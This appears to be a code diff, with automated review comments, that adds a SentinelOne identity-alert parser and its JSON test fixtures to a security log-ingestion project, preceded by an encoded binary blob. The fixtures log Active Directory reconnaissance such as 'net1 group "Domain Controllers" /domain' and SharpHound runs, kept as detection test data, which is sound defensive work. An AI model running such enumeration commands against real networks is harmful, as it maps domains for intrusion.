zl5x0h_K73HbY^??{QYxo_^lX@w(n#A3o*$=Q{nc|sU>|rEnYev#!e3=lJY!1$jI!d zp!ESG4yBEh&LqC_uN0To_Uup37b#XFmgr8{JH;_VFSlct|NKHsuPAEc-jpYEv5n=Z zm!{Zt944C6-y?_n zLJfAMj6jeh2xocL#OAui?^hwkSLcM&Pvzp?^hTlMVpNS`7hCzse!qkr$cuGf`y~+XjoRjjqn#-C)99m z8M3AqQI)TC(M*bcSxhz+jw0W>M*`hO0s(=gJsw{lxUpm6r^ZHL+V2)oi1Ek==*ZtCmP7Vx%voClFzk>~;A@zp-8k&1Vm7bVp zwtAyNyID-Z7P&RtoR6*0p@kx)?1un@1=cHPl2>q==-zK`i(~U;tGYj*EN7-((^y_| zsbd_@yOIPm^LEkq3trq4l#(*>?k82Ysj9k8J`F+MfSI+y5HOy8>2}sOBWMA%W`7L0 z+Y|&pKNALOBKjSQ6%zqvYFX4%=D|19@{YAJzpHH+x_V$>U?v_M2O2N!M`f%{ijTGz zL3Ot^kX?aIklgxA3Z2zZB%K;DsKPP8F|)oOMidL_y!A2~snMOan0^Elb#tAH=-UMc z0&xG~p~uwW@aso(9K4r60sCA)k(DPbs?6%vR*ZIu?xoijY|B5wn7ntsZ$zNl_r0=V?h4HC~F`m!%3q8|bd3n=qBX`B$Jhn8o$WOF*-NU9&WkpEwzQPvY_8N*( zG2y+S!&SrJ^#(8NVFXn=0Gc6rclk#&S(D3by(4aL5Qldn^?Hmp^&P9Z8t2{m_a^s` z{5y_D6%V8V<{V8(m%+lX=snpyaJ}HIGD)lRs zYCmnc`j`?*7N0>w&39cjqfYA+Jj=f;-kjbwt4F)C^$^rGwQUW}iF4t`nS!$qfbk#- zOU}`jD2Xsl38qd{JzBPn4(9mZqS4hE+|-KPM5K(a6Gg*gty`68OvmQ6KkUdMJif6E z#EaQ?YPp#K=IQWTBnj&N@-8TaNlT{NbFJtFDgS-F#5)rs`u_Cn?y7k1HR>;X?lWn7 zT2Zo(dt4UWUxX-?dTp4`x@z2eHnopejC8XNqn#7)*f~d=ZXbO}4|_1}lBhaB2D$2z 
zl}!7YT%pw2g6}=1$wLVXg~@~(KXIgHnII~;slp0;{UMsh~K&-`Vej(cb#qwE+PP#&bs zb1}b#>3~R<#OJp(Y2%0$@=^X4yv`rHLg^v{UT|}8`WCOf<&5V)4_>>~a~dPBb5d08 zY9VmO^y776a)PQy!RXt<%>XWv zdgbi>;Rg=^`$AGEOWl)BjUmR4R{BQ}qr2R1E&{19x^lnL0zE*dL9bQ9iSCtuAHc|T z20?Y#ZHeE1b-5z|?(9_N+a|BfY^2?i6WPKohFDVE-d{40v1SCl=>YAc?KZv#pzSgT0+TKY(#tiSCHSsFfDQhGSeCZ(!cVUPD zmxGLr%*N>7snNu;p8Y`31bv_hdsmSdjJ!z#c01iDdi$3N6)lu5?^l$4F_RqnYb0uA z)8eDncvVFpwFA>DIR4BjjH{D1VS57Q#`)OT5+UcrNo+`7Vm~pX#i1+vlI?;V;o4z{ zNX34A+U*oAcYzuH$6R2kAd-1%(NH(B*RzlX7%1Wse~HhKJ`y35dP2UG&!*}>X3`V< zn^{7_LZrrmylfZc?v%6>*#-UNb`vV4=2PGZnt25KtxV8}Q?rn9Vj^(vUC9pmWjoZA z&~9K>?i5CiLwUKj98+wL(>$w#`v{8jlJIE>#dV4qg5f|!- z?!bG!&&gB$YWAc9eDs8uEzI0=$|TVJ$^fy)4na4d6$%7CDm~X*w=Y%exbxyy9-WRb zgT>2leLtbD4o@`rCaTq7P0syyx6ht7Jv*4vS&f?}MIN6h&98aA>RVu-!^hUTHCCdD zx=DCyyd!2#i}?0M1O@9%6^6~Nr^ZezUP*sm`h4TN?pvwnG?Wp%Lr!d{k(rY-pGM}@ zk6%L0`*4LCiFPhuU#xL0;!Acl(+UT7p)^DP$NuP?LREvG6>k ze}?s8{KPH?^$>J#xWs%BE{f1zfMD+qc+yRZ(8!)$T#{#4LDFbuh73%Z$yY8oXs&_KH@IPhIh zdw`j#4rlAV+$Xg(e_GdWf-aVXvfe(X{QB2wi2ENLaHcdUF0V&-hdI!KE5jU z69wuV9TahcS1W1n4P0mI*ZD{QXmz2tj4yFBfTd}=2h!dmk{VOve11dsj7T;+e{qp< zWG$A6ct)aIRsoebxaj9HpWb4P?o#KRpXO#me{j)XX;4x_z#H{< zY<&2t=erEe>v@7I-`(lOnYc=`%XxFy8Oz!AuCQLw2<$oBPaF*PTiq=6q=@y*CwJ`Osqa6D`9Bb`1XbFAxvl z{@njYK;y;q(h3|Q5$*#1H9ygH`$4m*oDS(MCpt%Hm3EzM0=ZRI~$3JWWe#{G{8D>t^9mm7Udcl=A zlbX3nKEO?lP7+>yJq&+2^Gc9$P#CYHaB=^|i!nz(<2Pr)JdBx8NkI`>i}+>FrA%lN zYQR0yyPjz&3R+1Xd7`8gn=-P&oosr=2zpIky{8~aocA^|x~pQ}@A4*tv$I6h=o+df zlp3ro@j29*bMDjIr;qQZ&ftFxTuEp?cQK+2YYx+xIN_&$>-qc++h$-sv>Jmo-vhTp zXcPP0D)s{Omu;n;G|}3>!e|HQ!>z`yOSg(ayQ?g>{}NY^#JyUtH$TF9AlRkHV(`@~ zi6Ln~ppPxOgov_nYH~cdaI|OaKrEGz@;mqiwX>oTej$P8R~%CtWY_VL0!0Mz73H~J z!+9T4)s&T#v$JU{Vbd453uHTU$dAU;e8Z_b*&%9&EE?|I{=EQrXO!m<6FKd~A3ZH9 z{b7pgjYsG@nD{vQKeMURK@%=D*8U*eATW4W1?Mqn&y4_6$dcibbbA7+-C&7iYuC!P7 zx8dgAZ*1WH*1&KUh;N;Ojp@WmXvlVHM$`VwV<~qLG1Q?jXmB0hreXHkn0=b^*|{Hc z80FjNBNsvpo$e$#_1ub>)nW7xe)97t14*68H0!qSm!rVNm}dN1$o^z@oI~l@wUM&I zDJ(1;=3vhVNn2{zoVjcINpFt<& 
zFEOF7fYTul#(_YV2GrE-+vc>D0?MLdz|w1ZwsNh&A^5!Ko?Z|3gC1|cb~41o40HaU zOi5#?(_BIqk$YapBikmKrCyfZsRi)9uHKezNLUU8$RFnoT~DeeOTVqE3vHOcyY_JZ zUbv$pNPlFsHB5`6pEnqLWyIQ-n~ z(~hJP_QuG~04-It)@|Feg1uvbr|C-)m?fOt=1(30!Dgv!!Y{^dBNwC{>%vlb< z=z^niGIP*ZSUN(UHAT7P!O~3NR2c-Y{x8{%*SWnuA$-T=pzeOR6ve7OIDiliS?HUlH}tC-BqPk?zCQ(&vJ9{Bf9 zMORmsQw!iRq+W^o4gUs~ru3L3B2t6JACZ1V+FN@@jT}_u5@=0P^*8XJ&kmB-p{7n& z3mkH9{eD>oLY#5%+}E)#qu?i;xp>a+Pk5s3+1sB*i6ZGeV_jd zIS6*<6a2JOWHS!5_tWM^8EM5}xJIRGR=;gEv+uDI&v{=2q_HcO zl#T(odO$OXnl^hGGO(`^hCLC!Ve~608}+h2AOPCF9XCl?S&Eqcr0lO94SfHuIlAs8OH$jq zQdV%)W!@UP1{0;kqXRjF55y<3@CA{uZN@D#ebr9s)HYWug3bw{9lX80!w&6*=#haa z$ucM~TlHBv9FHH>Yd-?;deuQ(-tWaaT734!w`A^;QRdHmQ^M@++a zM5Y|kRyDLAj1B{K2>XP=;*5X_OR9jUtjUCQS_J$57Qo0c4K4f7i5OE~1wi!av9UVl zU0rTJ@jhWN6?>HC`q1y=i3UKgILuuLxK*<$1?{~p$@fb$^VB%^AAR|~TRhR15_~oZ z)P@=}kA%A?woiKjzjaL2J5F(}hVyf!JY8TYa7?Rm{s)hnxqmRyQ8WYJZeee55}rRp zMJeT@KrcFjt_C9J=znMX&ajinA%EbChekK+Imv395quCXWOD9OdmDUL^wW^dO~tr- zQxIw{!Zw%K)b@U9(U}<$`hukxW{!DFkTC@56v-QE^i}fa+#BAz%Kvl7&nW69Zq?gg z?{?{X^HULMrX)l~r;i?*1IXQySr1mxA#zs_At@yE-jG+n!xW58AF^REL9*s)qLslv zycCESJXvq0v(#^%zZCq{6h3g$VIP#AQAuTjTe!fbE63_bM%<|dbzk6;;|Ix#&>54G zllP-LqC5X%X?_2rU^3bZ0C()Mqy#WN33O$p68WP1VqqIv*0TL|i0E6QM6I!YD25Wa z1oGt=NVD>0f?KZe@0Ff6kjrI1^zCP;+D=rlax!lK2F`6V(;4jI!kh8-=@P(Gm(2z2 zttlK|mt%^J4)n*euDAe2_*Ci zTWyg&m%{jsotU+UV9#}p7cYRLG6Z0eP@JEKh^Q_b^|*|SU_kf?Jw5j&(#9f&l)c?= z|LV`$+8W;*%HS!6hU)nN7UqZF{<15FHU?qxWAO)HcE}UN9(R;%hN!S=ImuHSmyPG} z9d@7QpWc`;p;-238#V=o;^R;H#AnXi_~0tGHQwuD9ha8@EzhLs5pT;UleIV=xKj!C zQ&tzG}7-uci+D`bDOo?rG^jf*;39$KsW0 z{%n;T*y2aDgSlyNI>1sRfQVDL0ofd@=X60W-BMbF;FC#!Bvg&_m%91by4N!a(7RBd zeu~UX6C;#=Ujn`oph6w$hZjWdqp1A zl`j>IOS+pULa#gxRSv8|9Xs>6?>U=gs6Ulud;d({D>^?-7syFRm;k7A%8zw7D3g8p zs<=$}d=;`G+Vx{xF1`gkF1G^4`6{K&JONCry;$jF-pKQL`|WI;T)S$`4%~JgLH<{Q ze`QyxP`@zA^r-p091?p3n3pVlgXaNiNz5+#nt|{%`mkKLCeZ&2MJX8h0c|)w9m3ahh3oy({*Qgz($4swK~wmJsxdF zjngNUb}g4(>|9nY<>3@c+tAEp`#3M0Hxz8vAWjaGHTLX%)CiyTBk0zq#!Hu*KbLBZ z&Mq4j+f`DIpv}#(v$N}x+%Io_G&pZEz;|v%WU0M3;#6!r6{7`2ZImsdspYS>&a&0) 
zC+Oe$J*kAvfN0m5RK;?0B6r(3fp~|s2wkGIE*Q_o|QK+%EEWFQ*W^Uf4qjl&F=pgV=7nGKKv z;X495H7mb9p(=J{%O)KyJ&+C-1XXbuENWr9{C3WcUK6|(`)gy?{ca~m?cYU!-fQ^Z z?$Pg{JsYSBS=51q(0+#|*QvEb?+Y6)@U<-C+CiOgUZ?_Kc2yopKjM~rrO5dgR?4a% z*8JC>Jf1)6v5A`QGwKQKgqVi?HP$Jdgv&!Z9h?2UX}Y~N+OJpiUoCecYJR|Ir=;C$T?WFSWTsaWNfZx2;rOU`j53yUT4*k5 zVeb&hb1pWGkQA6xL(Oi&e@RaCdU?Ui_7|vkh3@)WKI@|Y8%2sEwX?T3mWhGExVvl! zq$~^quQVlrzSdc7b(iu_!J9MeU0i~kyPhIiUFk4HcDLmKN=H|3Zfcl`GAl%rg=hb$ z;hW({-~Q2*4Z*MvB)bxyz5;b^#qALt_wIaDy{y=I48{?MXAr)5k*`^V zTeO@S+iqJ^QAJsjQoSNw-kqKsvlGf<9KSgxnP ziZ&Giyvs%?D@ourkOn~~UF&d=@bKspgvT*}7fCHLFakBCHve&ef*bdo_wy9iY^Y`- z`-Zdw?Xwp+dcFCw+OZi%>ro<)uS)HT;8?sqpoYpvhTY!yM2d!LD;)5%#e#iRW;6;- zb3hA!u{Yk2q}FIpq%bD$OxU^~)84@Ym!Hx+rOcraN&*5SvgEEe#>|Y2?XkOUz@pW~ zyQZx@#hI)9y~LIw&%J?-+!lyi3Gcfwf`B4L3$`=F=2fw@`-}}`?#NfM{)mxLvfp>H z0VGA$&8}#ZCrI2Bo&N@mi-s+Ig^7*+{2APA{jqdCu2iQ|kV=Jy&OS-Tf-rn!-75ceuVY)J@af{xO~L z^=e(%2ZDNG68?wFm~UeE@4x`5u0c*g0VrCIY!8%&f)v5bRI}7Ee+xbcqJTKm*+JIJ zo|6t?@RRQ8BR#IJ- + SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats. + +data_sources: diff --git a/SentinelOne/identity/_meta/smart-descriptions.json b/SentinelOne/identity/_meta/smart-descriptions.json new file mode 100644 index 000000000..ad570cb92 --- /dev/null +++ b/SentinelOne/identity/_meta/smart-descriptions.json 
@@ -0,0 +1,46 @@
+[
+ {
+ "value": "Alert defined {sentinelone.identity.name} with status {sentinelone.identity.status} on {process.command_line}",
+ "conditions": [
+ {
+ "field": "sentinelone.identity.name"
+ },
+ {
+ "field": "sentinelone.identity.status"
+ },
+ {
+ "field": "process.command_line"
+ }
+ ]
+ },
+ {
+ "value": "Alert defined {sentinelone.identity.name} with status {sentinelone.identity.status}",
+ "conditions": [
+ {
+ "field": "sentinelone.identity.name"
+ },
+ {
+ "field": "sentinelone.identity.status"
+ }
+ ]
+ },
+ {
+ "value": "Alert defined {sentinelone.identity.name} on {process.command_line}",
+ "conditions": [
+ {
+ "field": "sentinelone.identity.name"
+ },
+ {
+ "field": "process.command_line"
+ }
+ ]
+ },
+ {
+ "value": "Alert defined {sentinelone.identity.name}",
+ "conditions": [
+ {
+ "field": "sentinelone.identity.name"
+ }
+ ]
+ }
+]
\ No newline at end of file
diff --git a/SentinelOne/identity/ingest/parser.yml b/SentinelOne/identity/ingest/parser.yml
new file mode 100644
index 000000000..507745cb7
--- /dev/null
+++ b/SentinelOne/identity/ingest/parser.yml
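Review bot: The file ends without a trailing newline (`\ No newline at end of file`), as do parser.yml and the test fixtures in this patch; add the final newline so later diffs do not churn on the last line. The summaries interpolate `{process.command_line}`, which is text copied verbatim from the endpoint process (the fixture shows `net1 group "Domain Controllers" /domain`), so whatever renders these descriptions must treat the substituted value as plain text rather than markup. `sentinelone.identity.classification` and `sentinelone.identity.confidenceLevel` are set by the parser but unused here; a variant such as `"Alert defined {sentinelone.identity.name} ({sentinelone.identity.classification}, {sentinelone.identity.confidenceLevel})"` would be more useful for triage than the status alone.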
@@ -0,0 +1,67 @@ +name: identity +pipeline: + - name: json_event + external: + name: json.parse-json + properties: + input_field: "{{original.message}}" + + - name: detected_at + filter: "{{json_event.message.detectedAt != null}}" + external: + name: date.parse + properties: + input_field: "{{json_event.message.detectedAt}}" + output_field: timestamp + + - name: started_at + filter: "{{json_event.message.firstSeenAt != null}}" + external: + name: date.parse + properties: + input_field: "{{json_event.message.firstSeenAt}}" + output_field: timestamp + + - name: last_seen_at + filter: "{{json_event.message.lastSeenAt != null}}" + external: + name: date.parse + properties: + input_field: "{{json_event.message.lastSeenAt}}" + output_field: timestamp + + - name: set_meta_fields +stages: + set_meta_fields: + actions: + - set: + event.kind: "alert" + event.category: "intrusion_detection" + event.type: "info" + observer.vendor: "SentinelOne" + observer.product: "Singularity Identity" + + "@timestamp": "{{detected_at.timestamp}}" + event.start: "{{started_at.timestamp}}" + event.end: "{{last_seen_at.timestamp}}" + + event.provider: "{{json_event.message.detectionSource.product}}" + event.reason: "{{json_event.message.description}}" + + process.command_line: "{{json_event.message.process.cmdLine}}" + process.parent.name: "{{json_event.message.process.parentName}}" + + file.path: "{{json_event.message.process.file.path}}" + file.name: "{{json_event.message.process.file.path | basename}}" + file.hash.sha1: "{{json_event.message.process.file.sha1}}" + file.hash.sha256: "{{json_event.message.process.file.sha256}}" + file.hash.md5: "{{json_event.message.process.file.md5}}" + + sentinelone.identity.id: "{{json_event.message.id}}" + sentinelone.identity.name: "{{json_event.message.name}}" + sentinelone.identity.attackSurfaces: "{{json_event.message.attackSurfaces}}" + sentinelone.identity.status: "{{json_event.message.status}}" + sentinelone.identity.classification: 
"{{json_event.message.classification}}" + sentinelone.identity.confidenceLevel: "{{json_event.message.confidenceLevel}}" + sentinelone.identity.result: "{{json_event.message.result}}" + sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}" \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_1.json b/SentinelOne/identity/tests/test_alert_1.json new file mode 100644 index 000000000..1e8b5bf2b --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_1.json 
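Review bot: `sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}"` reads a key that the vendor payload does not use: every fixture in this patch spells it `storylineId` (lower-case l), so the mapped field will always be empty, and the fixtures cannot catch it because their `storylineId` is `null`. Change the lookup to `"{{json_event.message.storylineId}}"` (the ECS-side name declared in fields.yml can stay) and add a fixture with a non-null storyline id. The same blind spot applies to `result`, `process.parentName`, `file.sha1` and `file.md5`, which are `null` in every visible fixture, so those four `set` lines are also unverified by the tests. `event.start` and `event.end` read `started_at.timestamp` and `last_seen_at.timestamp` even when the corresponding stage is skipped by its filter; test_alert_10 (with `process: null`) shows empty renderings are dropped from the output, so this is fine, but a one-line comment above `set_meta_fields` saying that empty values are dropped would make the intent clear.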
@@ -0,0 +1,49 @@
+{
+ "input": {
+ "message": "{\n \"id\": \"ba485919-e4c1-4496-9e2f-feb320f6841a\",\n \"name\": \"Domain Controller Discovery Detected\",\n \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\",\n \"detectedAt\": \"2024-11-22T05:35:09.000Z\",\n \"attackSurfaces\": [\n \"IDENTITY\"\n ],\n \"detectionSource\": {\n \"product\": \"Identity\"\n },\n \"status\": \"NEW\",\n \"assignee\": null,\n \"classification\": \"ENUMERATION\",\n \"confidenceLevel\": \"MALICIOUS\",\n \"firstSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"lastSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"process\": {\n \"cmdLine\": \"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Controllers\\\" /domain\",\n \"file\": {\n \"path\": \"c:\\\\windows\\\\system32\\\\net1.exe\",\n \"sha1\": null,\n \"sha256\": \"18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398\",\n \"md5\": null\n },\n \"parentName\": null\n },\n \"result\": null,\n \"storylineId\": null\n}"
+ },
+ "expected": {
+ "message": "{\n \"id\": \"ba485919-e4c1-4496-9e2f-feb320f6841a\",\n \"name\": \"Domain Controller Discovery Detected\",\n \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\",\n \"detectedAt\": \"2024-11-22T05:35:09.000Z\",\n \"attackSurfaces\": [\n \"IDENTITY\"\n ],\n \"detectionSource\": {\n \"product\": \"Identity\"\n },\n \"status\": \"NEW\",\n \"assignee\": null,\n \"classification\": \"ENUMERATION\",\n \"confidenceLevel\": \"MALICIOUS\",\n \"firstSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"lastSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"process\": {\n \"cmdLine\": \"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Controllers\\\" /domain\",\n \"file\": {\n \"path\": \"c:\\\\windows\\\\system32\\\\net1.exe\",\n \"sha1\": null,\n \"sha256\": \"18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398\",\n \"md5\": null\n },\n \"parentName\": null\n },\n \"result\": null,\n \"storylineId\": null\n}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T05:35:09Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.",
+ "start": "2024-11-22T05:35:09Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T05:35:09Z",
+ "file": {
+ "hash": {
+ "sha256": "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398"
+ },
+ "name": "net1.exe",
+ "path": "c:\\windows\\system32\\net1.exe"
+ },
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "process": {
+ "command_line": "C:\\Windows\\system32\\net1 group \"Domain Controllers\" /domain"
+ },
+ "related": {
+ "hash": [
+ "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398"
+ ]
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "ENUMERATION",
+ "confidenceLevel": "MALICIOUS",
+ "id": "ba485919-e4c1-4496-9e2f-feb320f6841a",
+ "name": "Domain Controller Discovery Detected",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_10.json b/SentinelOne/identity/tests/test_alert_10.json
new file mode 100644
index 000000000..deb56e2a5
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_10.json
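Review bot: The fixture's `result`, `storylineId`, `parentName`, `sha1` and `md5` are all `null`, so five of the parser's mappings (`sentinelone.identity.result`, `sentinelone.identity.storyLineId`, `process.parent.name`, `file.hash.sha1`, `file.hash.md5`) produce nothing and are not pinned by any expected value here; a fixture with those fields populated would make regressions in those lines visible. `related.hash` appears in the expected output although the parser never sets it; if it is added by a post-processing step outside this module, it is worth documenting that in the module's README or CHANGELOG so the next reader does not search the parser for it.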
@@ -0,0 +1,34 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935322-7b49-71f0-89e0-f52562c26e53\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:09:48.731Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:09:48.731Z\", \"lastSeenAt\": \"2024-11-22T09:09:48.731Z\", \"process\": null, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935322-7b49-71f0-89e0-f52562c26e53\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:09:48.731Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:09:48.731Z\", \"lastSeenAt\": \"2024-11-22T09:09:48.731Z\", \"process\": null, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T09:09:48.731000Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.",
+ "start": "2024-11-22T09:09:48.731000Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T09:09:48.731000Z",
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": 
"UNKNOWN",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935322-7b49-71f0-89e0-f52562c26e53",
+ "name": "Brute force attack - Mass Account Lockout",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_11.json b/SentinelOne/identity/tests/test_alert_11.json
new file mode 100644
index 000000000..a4d81025f
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_11.json
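Review bot: The timestamp format pinned here is inconsistent with the other fixtures: `detectedAt` `2024-11-22T09:09:48.731Z` is expected as `2024-11-22T09:09:48.731000Z` in `event.start`, `event.end` and `@timestamp`, while the fixture ending at L2112 expects `2024-11-22T05:35:09.000Z` to become `2024-11-22T05:35:09Z` with the zero fraction dropped. Both are valid RFC 3339, but the precision now depends on the input value, which looks like the default behaviour of a datetime-to-ISO formatter that omits the fraction only when it is zero rather than a deliberate choice. If a fixed representation is wanted, normalise in the parser to one precision (for example always `.731000Z`/`.000000Z`, or always the millisecond form `2024-11-22T09:09:48.731Z`) and update these expected values to match; otherwise a one-line comment in the parser documenting the variable precision would save the next reader the same question.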
@@ -0,0 +1,49 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935310-d00e-7616-81b9-fcb227ebb13d\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935310-d00e-7616-81b9-fcb227ebb13d\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": 
"2024-11-22T08:45:51Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.",
+ "start": "2024-11-22T08:45:51Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T08:45:51Z",
+ "file": {
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe",
+ "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+ },
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "process": {
+ "command_line": "Sharphound.exe"
+ },
+ "related": {
+ "hash": [
+ "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ ]
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "ENUMERATION",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935310-d00e-7616-81b9-fcb227ebb13d",
+ "name": "Domain Controller Discovery Detected",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_12.json b/SentinelOne/identity/tests/test_alert_12.json
new file mode 100644
index 000000000..1618da843
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_12.json
@@ -0,0 +1,49 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935310-eb28-7a57-9c27-87843b2cec61\", \"name\": \"AD Service Account Enumeration Detected\", \"description\": \"This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935310-eb28-7a57-9c27-87843b2cec61\", \"name\": \"AD Service Account Enumeration Detected\", \"description\": \"This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T08:45:51Z",
+ "kind": "alert",
+ "provider": 
"Identity",
+ "reason": "This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.",
+ "start": "2024-11-22T08:45:51Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T08:45:51Z",
+ "file": {
